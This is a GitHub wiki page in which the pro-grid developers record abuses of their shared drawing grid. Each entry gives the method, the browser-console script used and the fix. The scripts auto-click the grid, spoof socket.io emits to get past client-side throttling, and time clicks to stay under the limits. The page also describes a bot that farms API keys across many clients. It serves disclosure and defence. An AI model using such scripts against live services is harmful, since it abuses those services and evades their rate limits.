Exploit Museum - ridhoq/pro-grid GitHub Wiki

Primitive Click Loop

status: fixed as of https://github.com/ridhoq/pro-grid/pull/45

method

will keep the entire board white.

The inner filter/each statement actually selects all the non-white tiles. The problem is, it clicks so fast that it misses some, so I just run that a bunch of times to get the whole board. It's not exactly pretty, but way easier than trying to figure out when it's ok to send another click.

code

// Load jQuery (loads asynchronously: let it finish before running the loop below)
var script = document.createElement('script');
script.src = "http://code.jquery.com/jquery-latest.min.js";
document.getElementsByTagName('head')[0].appendChild(script);

// Click the cell if it is anything but white
var clickCell = function(options) {
    if (options.color != "") {
        console.logOld("Clicking row", options.row, "col", options.col);
        $(".col_" + options.row + "_" + options.col).click();
    }
};

// Intercept the console messages that are printed when a change comes over the network
console.logOld = console.log;
console.log = (function() {
    var log = console.log;
    return function() {
        log.apply(console, arguments);
        // Only the network-change messages are objects with row/col/color;
        // plain string logs (like "Starting loop" below) are skipped
        if (arguments[0] && typeof arguments[0] === "object") {
            clickCell(arguments[0]);
        }
    };
})();

// Clear the entire board; repeated because a single pass misses some tiles
for (var i = 1; i < 51; i++) {
    console.log("Starting loop", i);
    $(".g__col").filter(function(index) {
        return $(this).css('background-color') != "rgb(255, 255, 255)";
    }).each(function() {
        $(this).click();
    });
}

steps taken to mitigate

  • no logs on the client side
  • add client-side throttling: the click method can only be called once per 100ms

Spoof Socket.io Emit

status: fixed as of https://github.com/ridhoq/pro-grid/pull/45 and https://github.com/ridhoq/pro-grid/pull/56

method

Bypasses the client-side throttling of the click function by making a brand-new io.connect() and emitting messages to the server directly.

code

// Pick a random hex colour for this session
var hexDigits = "0123456789ABCDEF".split("");
var myColor = "#";
for (var i = 0; i < 6; i++) {
    myColor += hexDigits[Math.round(15 * Math.random())];
}

// Open a fresh socket, separate from the app's own (throttled) client
var socket = io.connect();

// Toggle the cell's background locally so the change is visible right away
var paint = function(row, col, color) {
    var cell = document.querySelector(".col_" + row + "_" + col);
    cell.style.backgroundColor = cell.style.backgroundColor ? "" : color;
};

// Paint locally, then emit the click straight to the server
var click = function(row, col) {
    paint(row, col, myColor);
    socket.emit("clicked", { row: row, col: col, color: myColor });
};

// Read the current background colour of a cell
var color = function(row, col) {
    return document.querySelector(".col_" + row + "_" + col).style.backgroundColor;
};

// Present in the original but a no-op there: `a` was the hex-digit array, so
// `a.gridClicked` is undefined and the throttled wrapper is never called.
// _.throttle(a.gridClicked, 0);

// Fill or clear the whole 32x32 grid
var fill_grid = function() {
    for (var y = 0; y < 32; y++) {
        for (var x = 0; x < 32; x++) { click(y, x); }
    }
};
var clear_grid = function() {
    for (var y = 0; y < 32; y++) {
        for (var x = 0; x < 32; x++) {
            if (color(y, x) != "") { click(y, x); }
        }
    }
};

steps taken to mitigate

  • Now you have to sign all your requests with an API key
  • A new API key is issued to you on connect and after each and every request made
  • If the API key is missing, malformed, or not registered, you are disconnected immediately

Timeout Clicker

status: fixed as of https://github.com/ridhoq/pro-grid/pull/45 and https://github.com/ridhoq/pro-grid/pull/56

method

Just runs through and clicks the grid at whatever interval you want.

code

// Load jQuery
var jq = document.createElement('script');
jq.src = "//ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js";
document.getElementsByTagName('head')[0].appendChild(jq);

// Interval between clicks, in ms (the first click fires after one delay)
var delay = 1000;
var i = 0;
var x = 0;

// Schedule one click per cell of the 32x32 grid, each one `delay` later than the last
for (i = 0; i < 32; i++) {
    for (x = 0; x < 32; x++) {
        setTimeout(
            // IIFE captures the current i and x for this timer
            (function(i, x) {
                return function() {
                    $('.col_' + i + '_' + x).click();
                };
            })(i, x), delay);
        delay += 1000;
    }
}

steps taken to mitigate

note

This will still work if you simply live within the client-side throttling rules. You could slowly but surely take over the grid with this code.

Advanced Bitmap Image Drawing Bot

status: will probably still compromise the app

method

examples of attacks:

for clarity: we are not responsible for what users draw on the grid

album: http://imgur.com/a/0g9Ll

evolution

  1. bot draws crude images spelled out in black and white
  2. we introduce API key requirement
  3. bot now spawns up to 16 clients at once to farm API keys
  4. bot begins drawing complex bitmap images
  5. bot begins cycling through a slideshow of different images

evasion tactics

The bot does a couple of things to avoid detection

  • images are drawn in random order. There is no pattern to how it renders the image
  • the bot spawns many clients

code

We have been unable to replicate this bot. If you know how to replicate this please contribute the code.

steps taken to mitigate

  • disconnect if you click too fast

unsolved problems

  • how to prevent many automated clients on one IP
  • the bot grabs the API key variable from the controller and is able to make programmatic requests
  • color is dictated on the client side